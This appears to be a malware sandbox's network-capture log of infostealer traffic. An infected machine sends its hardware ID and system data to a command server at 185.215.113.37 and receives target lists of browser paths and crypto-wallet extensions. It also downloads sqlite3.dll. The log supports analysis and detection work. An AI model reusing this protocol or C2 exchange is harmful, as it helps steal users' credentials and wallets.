Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="hwid"81B59BEC81D32089257003------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build"doma------HCAAEBKEGHJKEBFHJDBF--
Oct 3, 2024 18:38:10.464080095 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 31 42 35 39 42 45 43 38 31 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="hwid"81B59BEC81D32089257003------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build"doma------HCAAEBKEGHJKEBFHJDBF--
Oct 3, 2024 18:38:10.559427977 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:10.820581913 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:10 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 44 42 6d 4f 47 4a 69 5a 47 49 34 4e 6d 52 6b 4d 54 51 32 5a 54 56 6b 4d 6d 45 7a 5a 47 59 7a 4e 6d 4a 69 5a 57 55 7a 4e 6a 63 79 4d 54 63 31 5a 47 56 69 5a 6d 5a 6d 4d 6d 59 33 4e 32 45 77 4d 7a 45 30 4d 6a 63 78 4f 47 56 6d 59 7a 41 31 4d 7a 63 77 4e 6d 4d 31 4e 57 49 34 59 6a 49 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MDBmOGJiZGI4NmRkMTQ2ZTVkMmEzZGYzNmJiZWUzNjcyMTc1ZGViZmZmMmY3N2EwMzE0MjcxOGVmYzA1MzcwNmM1NWI4YjIzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 3, 2024 18:38:10.842526913 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 2d 2d 0d 0a Data Ascii: ------GDAEBKJDHDAFIECBAKKJContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------GDAEBKJDHDAFIECBAKKJContent-Disposition: form-data; name="message"browsers------GDAEBKJDHDAFIECBAKKJ--
Oct 3, 2024 18:38:11.080837965 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:10 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 3, 2024 18:38:11.083156109 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 3, 2024 18:38:11.124443054 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGC Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 2d 2d 0d 0a Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="message"plugins------FHJKKECFIECAKECAFBGC--
Oct 3, 2024 18:38:11.351234913 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:11 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 3, 2024 18:38:11.351362944 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 3, 2024 18:38:11.351381063 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 3, 2024 18:38:11.351985931 CEST	672	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 3, 2024 18:38:11.352004051 CEST	1236	IN	Data Raw: 64 47 6c 6a 59 58 52 76 63 6e 78 70 62 47 64 6a 62 6d 68 6c 62 48 42 6a 61 47 35 6a 5a 57 56 70 63 47 6c 77 61 57 70 68 62 47 70 72 59 6d 78 69 59 32 39 69 62 48 77 78 66 44 42 38 4d 48 78 43 61 58 52 33 59 58 4a 6b 5a 57 35 38 62 6d 35 6e 59 32 Data Ascii: dGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHxCaXR3YXJkZW58bm5nY2Vja2JhcGViZmltbmxuaWlpYWhrYW5kY2xibGJ8MXwwfDB8S2VlUGFzc1hDfG9ib29uYWtlbW9mcGFsY2dnaG9jZm9hZG9maWRqa2trfDF8MHwwfERhc2hsYW5lfGZkamFtYWtwZmJiZGRmamFvb2lrZmNwYXBqb2h
Oct 3, 2024 18:38:11.352755070 CEST	1236	IN	Data Raw: 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44 Data Ascii: cG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHw
Oct 3, 2024 18:38:11.352777004 CEST	492	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 56 75 54 57 46 7a 61 79 42 58 59 57 78 73 5a 58 Data Ascii: IFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1
Oct 3, 2024 18:38:11.354515076 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"fplugins------EGDGIIJJECFIDHJJKKFC--
Oct 3, 2024 18:38:11.593728065 CEST	335	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:11 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 3, 2024 18:38:11.621181965 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFC Host: 185.215.113.37 Content-Length: 7143 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 18:38:11.621270895 CEST	7143	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 41 41 46 48 44 48 44 48 4a 4b 45 47 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 Data Ascii: ------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------IEGCBAAFHDHDHJKEGCFCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 3, 2024 18:38:12.514806986 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:12.772311926 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:12.994091988 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 3, 2024 18:38:12.994172096 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 3, 2024 18:38:12.994208097 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 3, 2024 18:38:14.379698992 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFH Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 18:38:15.107007027 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:15.904325962 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
